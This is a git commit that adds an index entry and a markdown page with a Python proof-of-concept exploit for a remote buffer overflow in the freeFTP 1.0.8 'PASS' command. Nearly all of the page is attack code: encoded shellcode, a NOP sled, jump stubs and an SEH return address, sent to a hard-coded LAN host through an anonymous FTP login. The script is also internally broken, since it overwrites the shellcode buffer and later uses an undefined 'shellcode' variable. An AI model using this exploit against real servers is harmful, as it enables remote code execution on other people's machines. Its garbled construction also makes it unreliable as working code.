freeFTP1.0.8-PASS远程缓冲区溢出

2025-06-20 09:50:19 +00:00 · 2019-10-28 20:56:47 +08:00 · 2019-10-28 20:56:47 +08:00 · a673b4e707
commit a673b4e707
parent 24564f0f6a
2 changed files with 70 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -81,6 +81,7 @@
 - [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md)
 - [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)
 - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar)
 - [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md)
 ## 提权辅助相关
--- a/freeFTP1.0.8-'PASS'远程缓冲区溢出.md
+++ b/freeFTP1.0.8-'PASS'远程缓冲区溢出.md
@ -0,0 +1,69 @@
 ## freeFTP1.0.8-'PASS'远程缓冲区溢出  
 ## POC  
 ```python
 # Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
 # Date: 2019-09-01
 # Author: Chet Manly
 # Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
 # Version: 1.0.8
 # CVE: N/A
 from ftplib import FTP
 buf =  ""
 buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
 buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
 buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
 buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
 buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
 buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
 buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
 buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
 buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
 buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
 buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
 buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
 buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
 buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
 buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
 buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
 buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
 buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
 buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
 buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
 buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
 buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
 buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
 buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
 buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
 buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
 buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
 buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
 buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
 buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
 buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
 buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
 buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
 buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
 buf += "\x45\x35\x53\x30\x41\x41"
 buf = 'A' * 276
 buf += '\x90' * 10
 buf += shellcode
 buf += 'B' * (486 - len(shellcode))
 buf += '\x58' # pop eax
 buf += '\xfe\xcc' # dec ah
 buf += '\xfe\xcc' # dec ah
 buf += '\xff\xe0' # jmp eax
 buf += 'C' * 4
 buf += '\xe8\xf0\xff\xff\xff' # call near
 buf += 'D' * 9
 buf += '\xeb\xf0\x90\x90' # jump backwards
 buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
 buf += 'E' * (1000 - len(buf))
 ftp = FTP()
 ftp.connect('192.168.1.1', 21)
 ftp.login('anonymous', buf)
 ```